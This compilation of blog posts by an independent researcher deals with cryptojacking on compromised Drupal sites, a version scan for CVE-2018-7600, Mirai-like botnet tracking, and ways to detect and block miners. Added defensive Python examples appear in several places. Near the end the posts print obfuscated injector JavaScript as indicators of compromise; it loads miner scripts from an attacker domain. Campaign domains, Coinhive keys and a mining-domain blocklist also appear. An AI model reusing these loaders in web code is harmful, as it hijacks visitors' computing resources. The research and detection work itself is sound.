How to stop cryptojacking and the theft of your computing resources

Cryptojacking is defined as hijacking your desktop / laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).

Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found being injected on compromised websites. Some affected sites have been of well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.

Cryptojacking is typically resource intensive as malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.

High CPU usage caused by cryptojacking
High CPU usage caused by cryptojacking can be observed using the Task Manager.

Mined hashes are sent via a WebSocket connection to a mining pool or a service provider such as Coinhive. While Coinhive remains the market leader, I previously documented how to find other forms of cryptojacking malware that have grown in popularity.

Coinhive websocket traffic shown in Fiddler.


Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.


I recommend using MinerBlock to stop cryptojacking in your browser. This is an easy solution which requires no additional configuration out of the box. MinerBlock prevents cryptojacking using two methods: a frequently updated blacklist and detection of JavaScript executing cryptomining behavior. It’s available for Chrome and Firefox, and is open source.


Another effective method is to stop cryptojacking at the network level (firewall), preventing the malicious code from reaching your endpoints. I recommend using the CoinBlockerLists for this purpose. These lists are constantly updated as new malicious domains are frequently found.

The lists are available in various formats to easily integrate with your existing solution. A FireHOL feed is also available. For MacOS users, this guide illustrates how the CoinBlockerLists can be implemented using firewall software Little Snitch. Other methods such as DNS filtering using Pi-hole can be used with the CoinBlockerLists.
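As an added example (my code, not from the original post or from the CoinBlockerLists project), the Python below shows what a DNS-level filter such as Pi-hole does with a hosts-format blocklist: it loads the list, matches queried names against it including parent domains (so a subdomain of a listed domain is also caught), and reports which clients resolved a listed name. The blocklist excerpt and the dnsmasq-style query log lines are constructed for the example, not real data.

```python
import re

# Constructed excerpt in the hosts-file layout ("<sink address> <domain>"); not the real list.
SAMPLE_BLOCKLIST = """\
# constructed excerpt, hosts format
0.0.0.0 coinhive.com
0.0.0.0 coin-hive.com
0.0.0.0 upgraderservices.cf
0.0.0.0 vuuwd.com
"""

# Constructed Pi-hole / dnsmasq style query log lines; clients and queries are made up.
SAMPLE_DNS_LOG = """\
May 31 08:01:02 dnsmasq[123]: query[A] www.example.org from 192.168.1.10
May 31 08:01:03 dnsmasq[123]: query[A] coinhive.com from 192.168.1.10
May 31 08:01:04 dnsmasq[123]: query[A] ws001.coinhive.com from 192.168.1.10
May 31 08:01:05 dnsmasq[123]: query[A] notcoinhive.com from 192.168.1.11
May 31 08:01:06 dnsmasq[123]: query[A] upgraderservices.cf from 192.168.1.12
"""

QUERY_RE = re.compile(r"query\[\w+\] (\S+) from (\S+)")


def parse_hosts_blocklist(text):
    """Return the set of blocked domains from hosts-format (or bare-domain) text."""
    blocked = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        domain = parts[1] if len(parts) >= 2 else parts[0]
        blocked.add(domain.lower().rstrip("."))
    return blocked


def is_blocked(domain, blocked):
    """True if the name or any parent domain is listed; a bare TLD never matches."""
    labels = domain.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        if ".".join(labels[i:]) in blocked:
            return True
    return False


def flag_queries(log_text, blocked):
    """Return (client, queried name) pairs for every query that hit the blocklist."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m and is_blocked(m.group(1), blocked):
            hits.append((m.group(2), m.group(1)))
    return hits


if __name__ == "__main__":
    blocked = parse_hosts_blocklist(SAMPLE_BLOCKLIST)
    for client, name in flag_queries(SAMPLE_DNS_LOG, blocked):
        print(f"{client} resolved blocked domain {name}")
```

Matching on parent domains is the part that matters: a miner's WebSocket endpoint is usually a subdomain of the listed domain, so an exact-match lookup would miss it, while a plain substring match would wrongly block names like notcoinhive.com.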

Resource monitoring

As an independent security researcher, I don’t recommend a specific endpoint protection product for enterprises. Many antivirus / antimalware products such as Malwarebytes, ESET, Avast, Kaspersky, and Windows Defender will block most forms of cryptojacking and coinmining malware.

Even with some form of AV protection, resource monitoring of your on-premise and cloud infrastructure is critical. High CPU usage over a sustained period of time is the most apparent indicator of compromise in cases of cryptojacking. Consuming excessive computational resources will increase your cloud service provider bills and energy (electricity) costs.

PRTG logo

Personally, I use PRTG for all my monitoring needs. Paessler recently published a case study featuring my use of PRTG to monitor cryptojacking incidents. The impact of resource abuse and theft highlights the importance of monitoring. PRTG is free to use up to 100 sensors and can be downloaded here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I also coauthored a research paper, A first look at browser-based cryptojacking, for further reading on this topic.

As always, I’m most active on Twitter — follow me @bad_packets.

Over 100,000 Drupal websites vulnerable to Drupalgeddon 2 (CVE-2018-7600)

In my previous post, I detailed a large cryptojacking campaign that affected hundreds of Drupal websites. Multiple campaigns remain active today and are documented further in the latest SecurityTrails report. An important question was raised during my initial investigation — How many Drupal sites are vulnerable?

To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7. I promptly began scanning all the sites to establish which were vulnerable, and which were not.

I regarded sites that were using at least version 7.58 as not vulnerable to Drupalgeddon 2. This critical flaw is detailed in Drupal security advisory SA-CORE-2018-002 and has been assigned CVE-2018-7600.

Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites I could not ascertain the version used.
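Added example, not code from the original post: the version check described above, implemented over the contents of a Drupal 7 CHANGELOG.txt, with the same 7.58 threshold and the same three outcomes as the tally. The sample inputs are constructed to mirror that file's layout (newest entry first). As the 2018-06-07 update notes, a CHANGELOG showing an older version proves only that the site is outdated; it cannot tell whether a mitigation patch was applied separately, so "vulnerable" here means "outdated per CHANGELOG".

```python
import re

# SA-CORE-2018-002 / CVE-2018-7600 is fixed in Drupal 7.58 (per the advisory cited above).
FIXED_IN = (7, 58)

# Constructed samples mirroring the first lines of a Drupal 7 CHANGELOG.txt; not real sites.
SAMPLES = {
    "outdated.example": "\nDrupal 7.54, 2017-02-01\n-----------------------\n\n- Fixed bugs.\n",
    "patched.example": "\nDrupal 7.59, 2018-04-25\n-----------------------\n\n- Fixed security issues.\n",
    "exact.example": "\nDrupal 7.58, 2018-03-28\n-----------------------\n\n- Fixed security issues.\n",
    "hidden.example": "<html><body><h1>404 Not Found</h1></body></html>",
}

# The newest release is the first "Drupal X.Y, date" header in the file.
HEADER_RE = re.compile(r"^Drupal (\d+)\.(\d+)", re.MULTILINE)


def classify_changelog(text):
    """Return 'vulnerable', 'not_vulnerable' or 'unknown' for one CHANGELOG.txt body."""
    m = HEADER_RE.search(text)
    if not m:
        return "unknown"          # file missing, blocked, or not a Drupal changelog
    major, minor = int(m.group(1)), int(m.group(2))
    if major != FIXED_IN[0]:
        return "unknown"          # this check only knows the Drupal 7 release line
    return "not_vulnerable" if minor >= FIXED_IN[1] else "vulnerable"


def tally(changelogs):
    """Count sites per outcome, the same three buckets as the scan summary above."""
    counts = {"vulnerable": 0, "not_vulnerable": 0, "unknown": 0}
    for text in changelogs.values():
        counts[classify_changelog(text)] += 1
    return counts


if __name__ == "__main__":
    for site, text in SAMPLES.items():
        print(site, classify_changelog(text))
    print(tally(SAMPLES))
```

Run against your own sites' CHANGELOG.txt, this gives the same answer the scan gave, and the "unknown" bucket is a reminder that hiding the file is not a patch.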

Pie chart of vulnerable Drupal websites found

Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers.

Due to the highly critical risk of CVE-2018-7600 being exploited, the list of 115,070 vulnerable sites won’t be shared publicly. However, the list of sites has been shared with US-CERT and the Drupal Security Team. If you represent a national CERT/CSIRT and can offer assistance notifying affected organizations, please contact me.

2018-06-07 Update

The Drupal Security Team released a statement regarding my findings that questioned my methodology. While we know 115,000 sites are using outdated Drupal versions, based on the publicly accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did — unless we perform the actual exploit.

Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version of Drupal. Using an outdated content management system (CMS) is never best practice.

Another Drupal cryptojacking campaign discovered

While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.

When the campaign was first discovered, the domain name was using Cloudflare, so the real hosting provider was unknown.

The Coinhive site key used was “ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos” however this was later terminated. Because of this, the cryptojacking campaign operator switched to key “0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd” and resumed operations on the morning of May 31, 2018.

Twelve hours after my initial report, the malicious code was removed from and upgraderservices[.]cf was dropped by Cloudflare.

Once this was done, the hosting provider was revealed to be OVH. Simultaneously, the domain’s SSL certificate was switched to LetsEncrypt.

Hundreds of compromised Drupal sites found (again)

To locate compromised sites in this cryptojacking campaign, I scanned the nearly half million Drupal sites for upgraderservices[.]cf. Upon completion, 258 sites were found containing a reference to the malicious domain. I’ve created this spreadsheet listing all of the affected websites.

One of the affected sites in this campaign was the website of the Colorado Attorney General’s office.

Upon the discovery, I reported the site to US-CERT as I previously did for the US federal government sites found in the previous Drupal cryptojacking campaign. An incident number was assigned by the NCCIC Security Operations Center shortly thereafter.

I also set up PRTG monitoring to confirm when the site was remediated. This was done in less than 24 hours after my initial report.

Other websites in the campaign were noticed by Twitter users, including that of a food truck locating service.

Another affected website found was automobile parts manufacturer Magneti Marelli, a subsidiary of Fiat.

One example found in the campaign had upgraded their Drupal version to the latest version without removing the malicious content. As noted by the Drupal Security Team PSA, “simply updating Drupal will not remove backdoors or fix compromised sites” and further remediation steps are necessary.


Domain / URLs

Coinhive Site Keys

Closing Remarks

While the amount of vulnerable Drupal websites found is astounding, it’s good to see an even larger share of sites have patched the vulnerability. Hopefully this becomes a trend as more sites continue to be updated.

This latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale. If you’re a website operator using Drupal’s CMS, you need to update to the latest available version ASAP. The Drupal security team has prepared a guide of steps to take if your website has been compromised.

To stop cryptojacking in your browser, I recommend the extension minerBlock. The blocklist provided by CoinBlockerLists is an excellent resource to block coinmining malware and illicit cryptomining operations at the network level.

To learn more about my work and what others are saying about it, please visit this page.

As always, I’m most active on Twitter — follow me @bad_packets

Large cryptojacking campaign targeting vulnerable Drupal websites

Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system. After I analysed the IoCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many discovered were government and university sites from all over the world.

Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.

Deobfuscated Coinhive malware
In each case, the malicious code was obfuscated and unreadable to humans.

Once the code was deobfuscated, the reference to “http://vuuwd[.]com/t.js” was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.

Domain used to inject Coinhive malware
The Coinhive implementation has a small throttle configured to prevent 100% CPU usage.

The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by checking in Fiddler. This was a bit redundant as the high CPU usage was a clear indicator of the cryptocurrency mining (hashing) taking place. Regardless, it’s always good to check since Coinhive implemented a few changes to their platform and how they handle abuse after the Brian Krebs investigation.

After contacting the San Diego Zoo advising them to remove the malware, I took a closer look at the domain name vuuwd[.]com.

While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at hand, vuuwd[.]com.

This historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was used previously in Monero (XMR) mining operations via While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made.

Now that IoCs were clearly established, I turned to PublicWWW to locate other affected sites. The initial query I used yielded over 100,000 sites with references to the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the explicit snippet using a regular expression via PublicWWW’s snipexp function.

Once I had the potential list of affected sites, I began scanning them for IoCs containing the obfuscated Coinhive malware. This was done using tools developed for me by Dan Snider. Dan has frequently provided invaluable assistance to my research and I recommend reading more about his work here.

The big reveal

After the scan completed, the full scope of this cryptojacking campaign was established — 348 infected websites. Using the bulk scan feature of, it became clear that all of these sites were running outdated and vulnerable versions of the Drupal content management system.

The affected sites were spread across hosting providers and countries, and no specific one appeared to be targeted. The largest number of unique domains were found in the United States and were hosted by Amazon.

Unique domains found by country
Unique domains found by hosting provider

Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.

Government sites affected

The National Labor Relations Board – US federal agency

Government of Chihuahua, Mexico

City of Marion, Ohio

Arizona Board of Behavioral Health Examiners

Social Security Institute of the State of Mexico and Municipalities

Turkish Revenue Administration – Aydın Tax Office

Procalidad – “The Project Improvement of Higher Education Quality” – Peru

Matzikama Municipality

UMBRIA Special Reconstruction Office


University / school sites affected

University of Aleppo

College of Biblical Studies

IOHANES – University of Balamand

Ringling College of Art and Design

Vidyalankar Institute of Technology

University of Batangas

Asia Pacific Institute of Information Technology (APIIT)

Management Development Institute of Singapore in Tashkent

Islamic Azad University of the Semnan branch

Tan Dan Secondary School


Other sites affected

The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to infected JavaScript library (jquery.once.js?v=1.2) for each site is included. In addition, the title tag (name/description) has been extracted and is listed in the sheet.

2018-05-07 update

Additional websites have been identified and have been added to the Google Sheet. Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency.

Malicious code found on Lenovo’s portal page.

Websites of UCLA and DLink Brazil were also found injecting Coinhive.

Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency.

For some odd reason, the operator of this cryptojacking campaign chose to use a self-signed SSL certificate instead of a trusted (CA) one. This could have easily (and freely) been done using LetsEncrypt — but was not. Due to this, the cryptojacking malware fails to load in the browser via HTTPS.

In addition to the self-signed SSL cert misstep, the reference to the non-secure version is included in some sites, such as the Office of Inspector General of the EEOC. This is yet another blunder that hinders the effectiveness of this cryptojacking campaign as Coinhive does not load.

2018-05-16 update

This cryptojacking campaign continues as the malware host vuuwd[.]com has been restored with a new Coinhive site key.

The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story.



https://vuuwd[.]com/t.js (Self-signed SSL cert by "WIN-QNCIT36VCLJ")

var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();


Closing Remarks

We’ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website and you may need to take further remediation steps.

To stop cryptojacking in your browser, I recommend the extension minerBlock to block cryptojacking malware.

If you use other methods of blocking malicious activity at the network level, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Recent Podcasts: Packet Pushers & The CoinSec Podcast

In the last month, I was invited to participate in two podcasts. The first was with Packet Pushers and the second with The CoinSec Podcast. This was definitely less hectic than doing a live interview on Canadian national television. In both shows, I shared my thoughts on cryptojacking and other security topics.

Packet Pushers Podcast

Packet Pushers logo

For the Packet Pushers podcast, I was a guest of Paessler. They are the company behind the enterprise and network monitoring application, PRTG. I’ve frequently mentioned PRTG in my tweets as it’s one of my favorite monitoring tools. One of the notable incidents I always like to reference is the Showtime Networks case. This was the first major case of cryptojacking affecting a well-known website and I was the first to document the incident.

PRTG allows me to monitor any website for Coinhive and other cryptojacking malware. This was valuable when the website of was also compromised. I was able to quickly and easily configure monitoring for the site.

In addition to the HTTP Advanced sensor, I use numerous other sensor types in PRTG including: SNMP, SSH, SSL, WMI, and many others discussed in the Packet Pushers podcast. Tune in to find out my favorites!

If you’re looking for the peer-reviewed research paper mentioned in the show, please visit my Publications page.

The CoinSec Podcast

The CoinSec Podcast logo

The second podcast I recorded was with The CoinSec Podcast. This show is about cryptocurrency and blockchain technologies with a focus on securing them. I had a great time discussing cryptojacking and other security issues affecting the cryptocurrency ecosystem.

Closing Remarks

While it’s a little nerve-wracking recording podcasts or television interviews, I always enjoy sharing my thoughts on cryptojacking and other security topics. If you’d like to learn more about my work and what others are saying about it, please see this page.

As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

My favorite website scanning services

In my research, I primarily use two publicly available website scanning services: and Sucuri SiteCheck. These tools allow me to quickly locate malicious code, which usually consists of Coinhive. However, many other types of cryptocurrency mining scripts are in use today.

While Coinhive remains the market leader for now, their dominance in the cryptojacking “industry” has declined in 2018.

I recently documented how to find cryptojacking malware and recommend it as an excellent use case for the services offered by PublicWWW.

Website Scanning Services

My first choice for scanning and archiving a website’s source code is I’ve provided many examples of how valuable this service is on Twitter.

Cryptojacking detection was added to early in January 2018. This enables you to check if a website is engaging in malicious cryptocurrency mining, based on known signatures of cryptojacking malware (JavaScript).

It’s also useful when you search for a URL to check if a website was previously infected.

The archived results show Coinhive was found on

In a recent example, the official website of travel guidebook publisher Lonely Planet was compromised to run Coinhive. Despite numerous contact attempts, I received no confirmation or denial from Lonely Planet regarding this incident. However, based on the copy of the affected JavaScript library, Coinhive was removed sometime on or after March 7, 2018.

Another valuable tool for scanning websites for cryptojacking malware is Sucuri SiteCheck. Sucuri is a security company, owned by GoDaddy, that I have no affiliation with. I do however like using their website scanning service.

Sucuri SiteCheck

This scanning service helps you quickly locate the source of the malicious code. Sucuri’s scanner also detects other forms of malware and isn’t limited to cryptojacking.

Sucuri SiteCheck

In this example, the website is infected with malware that redirects users to a tech support scam site. The offending code is easy to find thanks to the results presented by Sucuri. Sadly, this was only one of many Drupal sites that were recently exploited.

Closing Remarks

While Coinhive’s market share has declined in 2018, cryptojacking malware as a whole remains a persistent threat.

To stop cryptojacking in your browser, I recommend using a dedicated extension, minerBlock, to block cryptojacking malware.

If you use other forms of blocking, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Mirai-like Botnet One Year Review and a New Website!

In February 2017, I started my passive honeypot and began listening for all incoming network traffic. As the months passed, I saw numerous exploit attempts, constant port scans, and other suspicious traffic. It wasn’t until October that, with the help of Dr. Neal Krawetz, I started cataloging Mirai-like botnet traffic specifically.

What does Mirai-like mean?

Incoming scans from Mirai-like botnets have a very distinct fingerprint in the network traffic generated by infected hosts. The TCP sequence number will always equal the IP address of the target device. This intentional behavior is documented in the original Mirai source code, shown in the snippet below:

Snippet of Mirai source code

Typically, the target IP address is encoded in decimal (numeric) format. As the target IP changes, the Sequence Number of the traffic coming from the infected host will change accordingly as shown in the example below:

Example showing TCP Sequence Number = Destination IP address

Your logs may vary and instead record the sequence number in hexadecimal format. Either way, once converted to an IP address, the pattern is clearly established.
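Added example, not from the original post: a check for the fingerprint just described, run over a few constructed honeypot log lines in a made-up `SRC= DST= SEQ=` layout (real capture formats differ). It converts each sequence number, whether recorded in decimal or as 0x-prefixed hex, to dotted-quad form and reports the source addresses whose sequence number equals the destination IP.

```python
import ipaddress
import re

# Constructed log lines (not real honeypot data). 198.51.100.23 is 3325256727 in decimal
# and 0xc6336417 in hex, so lines 1, 2 and 4 carry the Mirai-like fingerprint; line 3 does not.
SAMPLE_LOG = """\
2018-02-19T10:00:01Z SRC=203.0.113.7 DST=198.51.100.23 SEQ=3325256727
2018-02-19T10:00:02Z SRC=203.0.113.7 DST=198.51.100.24 SEQ=3325256728
2018-02-19T10:00:03Z SRC=198.51.100.200 DST=198.51.100.23 SEQ=0x2f5a1b3c
2018-02-19T10:00:04Z SRC=192.0.2.44 DST=198.51.100.23 SEQ=0xc6336417
2018-02-19T10:00:05Z SRC=192.0.2.45 DST=198.51.100.23 SEQ=99999999999
"""

LINE_RE = re.compile(r"SRC=(\S+) DST=(\S+) SEQ=(\S+)")


def seq_to_ip(seq):
    """Convert a decimal or 0x-prefixed hex TCP sequence number to dotted-quad form.

    Returns None when the value does not fit in 32 bits (garbled or non-IPv4 data).
    """
    try:
        value = int(seq, 16) if seq.lower().startswith("0x") else int(seq, 10)
        return str(ipaddress.IPv4Address(value))
    except (ValueError, ipaddress.AddressValueError):
        return None


def is_mirai_like(dst_ip, seq):
    """The Mirai fingerprint: the raw sequence number encodes the target's own address."""
    return seq_to_ip(seq) == dst_ip


def find_mirai_like_sources(log_text):
    """Return the sorted, de-duplicated source IPs exhibiting the fingerprint."""
    sources = set()
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m and is_mirai_like(m.group(2), m.group(3)):
            sources.add(m.group(1))
    return sorted(sources)


if __name__ == "__main__":
    for src in find_mirai_like_sources(SAMPLE_LOG):
        print("Mirai-like scanner:", src)
```

A single matching packet is a weak signal on its own, since one in four billion random sequence numbers will collide by chance; in practice the pattern holds across every probe from the same source, which is what makes it usable for cataloging unique IPs the way the post describes.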

Dr. Krawetz shared his thoughts on this technique, “This is actually kind of brilliant. Each bot slings out packets and doesn’t store any information. When a response comes back, the botnet can identify the sender by the sequence number.”

Once the fingerprint of the Mirai-like botnet was established, I was able to review the IP addresses found in my logs for further patterns. Late in October 2017, I shared my findings of a botnet consisting of EnGenius routers.

Instead of continuing to isolate specific devices in the botnet and the volume of traffic generated, I began cataloging new unique IP addresses while noting the network provider (ASN) and country they came from. This allowed me to gauge the growth rate and estimate the size of active botnets. Subsequently, I started sharing my Mirai-like botnet statistics daily on Twitter.

One Year of Data Collected

New unique IP addresses seen in Mirai-like botnet from 2017-02-19 to 2018-02-19

Reviewing the entire dataset I collected, the overall Mirai-like botnet volume averaged around 500 new unique IP addresses per day in March 2017 and steadily declined until September 2017. After this point, a surge in botnet activity was observed. The most new unique IP addresses I saw in a single day was 1,384 on November 29.

The explosion in activity was largely attributed to the Satori botnet which enslaved devices in Argentina, Egypt, Colombia, and Tunisia. This botnet grew exponentially after a zero-day exploit was used to target Huawei HG532 routers. Numerous devices from Japan were also found after a UPnP exploit targeting Realtek devices was used.

During the height of the activity between November 22nd and December 7th, those countries accounted for a large share of the new unique IP addresses found.

New Unique IPs seen in Mirai-like botnet from 2017-11-22 to 2017-12-07 by Country

Similarly, network providers (ASNs) from Colombia, Egypt, and Argentina combined for 39% of all new unique IP addresses seen during this time period.

New Unique IPs seen in Mirai-like botnet from 2017-11-22 to 2017-12-07 by ASN

Growing Pains

The challenge of collecting and sharing the Mirai-like botnet data every day quickly became apparent. A publicly shared Google Sheet was not a long term option, so I asked my Twitter followers for assistance building a proper solution.

Alex Rhodes rose to the challenge and offered his time and expertise to build a database backend to store the data. He also designed and implemented a website for sharing the botnet data. Alex is a software engineer in the aerospace industry and is currently working towards a Master’s degree in Cybersecurity at Syracuse University.

The new website is easy to configure and manage and I’m truly grateful for the finished product Alex has delivered.

New website:

The new website offers filtering options for every field, including IP Address, Country, ASN, and date range. It also expands on the features formerly offered in the spreadsheet, including the following lookups:

IP address (DomainTools)
ASN (Hurricane Electric BGP Toolkit)

In addition to the main page, which is updated daily, we can also filter by the top ASN and country for a specified time period. Using this, we can review the all-time leaders for the entire year of Mirai-like botnet data collected.

China dominated the count of unique IPs seen with 27,672. India and Brazil both had over 10,000 unique IPs each. Japan and Argentina were close behind with over 9,000 unique IPs each. Russia and the United States were also among the top 10 countries with 7,801 and 5,045 unique IPs, respectively.

Top 10 Country

Continuing the trend, network providers China Telecom and China Unicom led in total overall volume, combining for a total of 23,243 unique IPs seen. Coming in third place was Telefonica de Argentina with 7,576 unique IPs. Rounding out the top five network providers in unique IPs seen was Rostelecom (Russia) with 5,407 and Tigo Colombia with 3,301.

Top 10 ASN

During the one year of data collection, I saw botnet traffic from 179 of the 195 recognized countries in the world. IP addresses registered to 5,581 unique network providers (ASNs) were also observed. It was clear that Mirai-like botnet activity was truly a worldwide phenomenon.

Closing Remarks

The unique IPs seen by my honeypot are only a tiny fraction of those participating in active botnets. In the case of the Satori botnet, other security researchers estimate the total size peaked around 650,000 infected devices.

The data provided via the new website will remain free and open to the public. I will continue to update it daily with my latest available data.

Follow me on Twitter to receive my daily Mirai-like botnet statistics update of new unique IPs seen, top ten countries and top five ASNs seen in the Mirai-like botnet.

How to find cryptojacking malware

Cryptojacking malware continues to spread across the web, largely due to the popularity of Coinhive. Since Coinhive’s launch in September 2017, numerous cryptojacking clones have come about.

The tool I’ve chosen to locate them with is PublicWWW. This is a search engine that indexes the entire source code of websites. I previously offered a comparison of their dataset versus other providers in my discussion of Coinhive malware specifically.

In this post, I detail how to find websites containing Coinhive, Crypto-Loot, CoinImp, and deepMiner in PublicWWW.

Let’s jump in and see how many sites with cryptojacking malware we can find!


Before we review some of the knock-offs, let’s look at the name most synonymous with cryptojacking, Coinhive. Finding this malware is relatively easy and various queries can be used to locate it. The original Coinhive JavaScript library used in cryptojacking is “coinhive.min.js” and we can start by simply searching for that. It’s important to search for the entire name in quotes to ensure an exact match is returned by PublicWWW.

PublicWWW search for "coinhive.min.js"

Using this query, we find 34,474 sites. While this may seem like an astounding number, it’s only a modest increase since I wrote about the 30,000 sites found back in November 2017.

While this list of sites is great for an overview of sites with Coinhive malware, we can dig even deeper into PublicWWW’s dataset to extract the Coinhive site key used on each site. This can be done using regex to extract the site key as a snippet: "coinhive.min.js" snipexp:|CoinHive.Anonymous\('?(\w{32})'|i

PublicWWW search for "coinhive.min.js" snipexp:|CoinHive.Anonymous\('?(\w{32})'|i

Once the Coinhive site key is extracted, we can export the results and correlate which sites are part of a cryptojacking campaign. This correlation of a small number of Coinhive site keys to hundreds and even thousands of websites was documented in my previous post.

Recently I found a large cryptojacking campaign targeting 5,451 WordPress sites. In each case, the JavaScript containing Coinhive was hidden via obfuscation.

Example site found in WordPress cryptojacking campaign
The obfuscated JavaScript code is illegible and must be deobfuscated first to be human-readable.

